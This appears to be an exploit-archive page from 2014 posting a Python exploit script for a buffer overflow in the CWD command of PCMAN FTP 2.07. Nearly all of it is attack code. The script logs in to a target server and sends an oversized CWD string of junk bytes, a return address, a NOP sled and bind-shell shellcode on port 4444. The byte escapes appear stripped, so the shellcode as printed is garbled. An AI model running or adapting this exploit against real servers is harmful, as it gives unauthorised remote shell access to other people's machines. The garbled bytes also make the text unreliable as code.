Home / exploits PCMAN FTP 2.07 CWD Buffer Overflow
Posted on 31 January 2014
# Exploit Title: PCMAN FTP 2.07 CWD Command Buffer Overflow # Date: Jan 25,2014 # Exploit Author: Mahmod Mahajna (Mahy) # Version: 2.07 # Tested on: Windows 7 sp1 x64 (english) # Email: m.dofo123@gmail.com import socket as s from sys import argv # if(len(argv) != 4): print "USAGE: %s host <user> <password>" % argv[0] exit(1) else: #store command line arguments script,host,fuser,fpass=argv #vars junk = 'x41' * 2012 #overwrite function (CWD) with garbage/junk chars espaddress = 'x59x06xbbx76' # 76BB0659 nops = 'x90' * 10 shellcode = ( # BIND SHELL | PORT 4444 "x31xc9xdbxcdxbbxb3x93x96x9dxb1x56xd9x74x24xf4" "x5ax31x5ax17x83xeaxfcx03x5ax13x51x66x6ax75x1c" "x89x93x86x7ex03x76xb7xacx77xf2xeax60xf3x56x07" "x0bx51x43x9cx79x7ex64x15x37x58x4bxa6xf6x64x07" "x64x99x18x5axb9x79x20x95xccx78x65xc8x3fx28x3e" "x86x92xdcx4bxdax2exddx9bx50x0exa5x9exa7xfbx1f" "xa0xf7x54x14xeaxefxdfx72xcbx0ex33x61x37x58x38" "x51xc3x5bxe8xa8x2cx6axd4x66x13x42xd9x77x53x65" "x02x02xafx95xbfx14x74xe7x1bx91x69x4fxefx01x4a" "x71x3cxd7x19x7dx89x9cx46x62x0cx71xfdx9ex85x74" "xd2x16xddx52xf6x73x85xfbxafxd9x68x04xafx86xd5" "xa0xbbx25x01xd2xe1x21xe6xe8x19xb2x60x7bx69x80" "x2fxd7xe5xa8xb8xf1xf2xcfx92x45x6cx2ex1dxb5xa4" "xf5x49xe5xdexdcxf1x6ex1fxe0x27x20x4fx4ex98x80" "x3fx2ex48x68x2axa1xb7x88x55x6bxcex8fx9bx4fx82" "x67xdex6fx34x2bx57x89x5cxc3x31x01xc9x21x66x9a" "x6ex5ax4cxb6x27xccxd8xd0xf0xf3xd8xf6x52x58x70" "x91x20xb2x45x80x36x9fxedxcbx0ex77x67xa2xddxe6" "x78xefxb6x8bxebx74x47xc2x17x23x10x83xe6x3axf4" "x39x50x95xebxc0x04xdexa8x1exf5xe1x31xd3x41xc6" "x21x2dx49x42x16xe1x1cx1cxc0x47xf7xeexbax11xa4" "xb8x2axe4x86x7ax2dxe9xc2x0cxd1x5bxbbx48xedx53" "x2bx5dx96x8excbxa2x4dx0bxfbxe8xccx3dx94xb4x84" "x7cxf9x46x73x42x04xc5x76x3axf3xd5xf2x3fxbfx51" "xeex4dxd0x37x10xe2xd1x1dx1axcd") sploit = junk+espaddress+nops+shellcode #create socket conn = s.socket(s.AF_INET,s.SOCK_STREAM) #establish connection to server conn.connect((host,21)) #post ftp user conn.send('USER '+fuser+' ') #wait for response uf = conn.recv(1024) #post ftp password conn.send('PASS '+fpass+' ') #wait for response pf = conn.recv(1024) #send ftp command with sploit conn.send('CWD '+sploit+' ') cf = conn.recv(1024) #close connection conn.close()
